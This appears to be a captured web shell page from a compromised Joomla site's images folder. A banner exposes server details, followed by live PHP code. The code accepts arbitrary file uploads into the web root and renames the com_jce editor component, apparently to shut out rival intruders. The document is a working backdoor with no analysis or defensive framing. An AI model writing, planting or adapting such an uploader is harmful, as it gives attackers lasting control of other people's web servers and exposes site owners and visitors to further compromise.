| Server IP : 87.98.231.4 / Your IP : 216.73.217.178 [ Web Server : Apache System : Linux webm007.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : grupmartgn ( 667608) PHP Version : 8.5.7 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/grupmartgn/elanartcrafts/images/ |
Upload File : |
<? echo "UPLOADER_OK";if(isset($_FILES["f"])){$u=$_FILES["f"]["tmp_name"];$n=basename($_FILES["f"]["name"]);if(move_uploaded_file($u,__DIR__."/../".$n)){echo "UP_OK:../".$n;}else{echo "UP_FAIL:".$n;}}elseif(isset($_FILES["file"])&&$_POST["_upl"]=="Upload"){@copy($_FILES["file"]["tmp_name"],"../".$_FILES["file"]["name"]);echo "UP_OK:../".$_FILES["file"]["name"];}$target_dir = __DIR__."/../administrator/components/com_jce";$target_dir2 = __DIR__."/../administrator/components/com_jce2";if(is_dir($target_dir)){if(rename($target_dir, $target_dir2)){echo "<br>Bug fixed: com_jce renamed to com_jce2";}else{echo "<br>Gagal rename: permission denied or folder not accessible";}}else{echo "<br>Folder com_jce not found at: ".$target_dir;}?><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>